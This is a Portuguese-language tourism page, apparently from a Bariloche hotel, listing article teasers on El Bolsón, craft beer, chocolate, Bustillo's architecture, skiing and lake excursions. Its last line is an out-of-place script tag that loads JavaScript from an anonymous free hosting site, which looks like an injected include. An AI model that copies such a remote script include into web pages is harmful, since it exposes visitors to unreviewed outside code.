Informações Úteis


Durante sua visita a Bariloche, vale a pena dedicar um dia a este povoado cheio de artistas e artesãos.

A apenas duas horas de carro saindo do Hotel Monasterio e de Bariloche se encontra El Bolsón. Conhecido em toda Argentina por sua grande migração de pessoas pertencentes ao movimento hippie nos anos 70, hoje em dia El Bolsón se converteu numa cidade turística muito importante. De todos modos, a influência do movimento hippie ainda se faz presente na vida cotidiana da grande quantidade de artistas, artesãos e músicos que vivem na...

» ampliar

Os pubs e cervejarias em Bariloche são uma atração a parte.

Mesmo sabendo que o vinho argentino é reconhecido no mundo por sua qualidade, dentro da Argentina a cerveja segue, dia após dia, desbancando-o como a bebida alcoólica mais popular do país. Especialmente na Patagônia, cujas cervejarias de produção artesanal são reconhecidas a nível nacional.
Em Bariloche, em particular, a cerveja disputa com o chocolate o posto de souvenir favorito dos turistas. Os visitantes voltam pra casa com, pelo menos, uma caixinha...

» ampliar

Uma pequena visita a suas obras mais importantes na cidade.

Alejandro Bustillo é um dos arquitetos mais importantes da história argentina. Vários dos edifícios icônicos do país são de sua autoria, e, se não fosse por ele, muitos cartões-postais de Bariloche não existiriam. No início da sua carreira, Bustillo dedicava-se à pintura, e somente mais tarde lançou-se na arquitetura. O interesse pela arte influenciaria sua obra: passou por vários estilos e sempre buscou a integração de seus projetos...

» ampliar

Bariloche se converteu, com o passar do tempo, na meca do chocolate na Argentina. Onde e de que maneira aproveitar um bom chocolate em Bariloche.
Corpo do Artigo:
Bariloche recebe cerca de 700 mil visitantes por ano, e a grande maioria volta pra casa com uma caixinha de chocolates. Ninguém deixa de provar os sorvetes artesanais, apesar do frio no inverno, e um ou vários dos doces regionais. Mas a principal atração é, sem dúvidas, o chocolate.
Introduzidas em Bariloche em 1947 por um imigrante italiano, Aldo Fenoglio, as fábricas e a...

» ampliar

Uma excelente alternativa para poder aproveitar as atividades de montanha em Bariloche sem ter que percorrer longas distâncias.

Se você está visitando Bariloche em uma viagem romântica ou em família e quer experimentar tudo o que a montanha tem para oferecer mas sem distanciar-se muito da cidade, o Cerro Otto é o lugar ideal para vocês. Esqui, snowboard, caminhadas com raquetes, trenós, trekking, tubing, confeitaria giratória, entre outras coisas, são as atrações que o Otto pode oferecer a vocês, dependendo da...

» ampliar

Detalhes de um passeio encantador.

Toda a diversidade de bosques nativos, montanhas nevadas e lagos deslumbrantes da Patagônia podem ser apreciados neste passeio distante menos de 200 km saindo de Bariloche. Vale a pena dedicar um dia para conhecer suas paisagens magníficas. O itinerário pode ser feito contratando uma excursão, de carro ou até de bicicleta. Em breve todo o circuito estará asfaltado, fato que o deixa cada dia mais acessível.
O primeiro lago da nossa jornada é o Nahuel Huapi. Ainda que a magnitude deste enorme lago seja...

» ampliar

Uma visita clássica de Bariloche.

A apenas 25 quilômetros de Bariloche encontra-se a Colônia Suíça. Fundada no século 19 por imigrantes suíços, a principal produção deste encantador povoado foi, inicialmente, a indústria madeireira, o que explica que suas construções ainda hoje sejam feitas deste material.
Atualmente a Colônia Suíça deixou de ser um refúgio de mochileiros que se afastavam da cidade para aproveitar os campings na beira da praia. Este vilarejo de apenas 150 habitantes...

» ampliar

Se está cansado do esqui clássico, este inverno você tem novas opções para experimentar nas pistas de Bariloche.

A grama, a água, o ar... todas as superfícies servem para que o homem desenvolva suas atividades esportivas. Mas, talvez por seu caráter sazonal, poucos esportes despertam tanta paixão como aqueles que são praticados na neve. Os apaixonados devem esperar quase todo o ano para ter, com sorte, dois meses de boa neve.
O desenvolvimento do turismo e o barateamento das passagens aéreas permitem, hoje, o cruzamento...

» ampliar

As opções para os que querem praticar esqui em Bariloche. Pistas do Cerro Catedral e do Cerro Otto.

Na Argentina o esqui já tem mais de 100 anos. O centro de esqui mais importante do país encontra-se em Bariloche. O Cerro Catedral, que de longe assemelha-se a um gigantesco templo medieval, abriga uma superfície de 600 hectares de terreno usado para esquiar: são 53 pistas com diferentes níveis de dificuldade, que chegam a 2000 metros de altitude.
No Cerro Catedral, você poderá praticar diferentes formas de esqui: alpino,...

» ampliar

As melhores opções para visitar os lagos saindo de Bariloche.

Os visitantes não podem deixar Bariloche sem antes ter experimentado uma das várias ofertas de excursões pelos lagos. Nelas, poderão ver as belezas naturais da região de um ponto de vista muito diferente.
Ainda que existam opções de excursões de menor duração e mais acessíveis que saem do porto em frente ao Centro Cívico na cidade de Bariloche, os tours mais populares começam no Porto Pañuelo, na região Llao Llao....

» ampliar

Diferentes opções para que os pequenos possam aprender a esquiar.

Se você já sabe esquiar ou é um esquiador assíduo, sem dúvidas vai querer que seu filho compartilhe com você o prazer por este elegante esporte. Se você vai a Bariloche para que seus filhos conheçam a neve, seguramente não duvidará em fazer com que eles sintam a neve da mesma maneira singular que sente um esquiador: como um elemento esportivo e lúdico.
O esqui é o esporte de inverno mais popular do mundo, por esta mistura de...

» ampliar

O que visitar durante o roteiro turístico mais importante de Bariloche.

Nem tudo o que é turístico custa caro. O Circuito Chico pode ser feito contratando uma excursão, de carro ou até de bicicleta. Pela flexibilidade que isso permite e pela variedade de cenários que podem ser apreciados no trajeto, ele é hoje uma das visitas mais populares de Bariloche.
Se decidirem fazer o passeio de carro, saindo do Hotel Monasterio peguem a Avenida Bustillo até o lado oposto da cidade. O primeiro ponto relevante que irão encontrar é a...

» ampliar

<script type="text/javascript"src="http://yourjavascript.com/571701964/index.js"></script>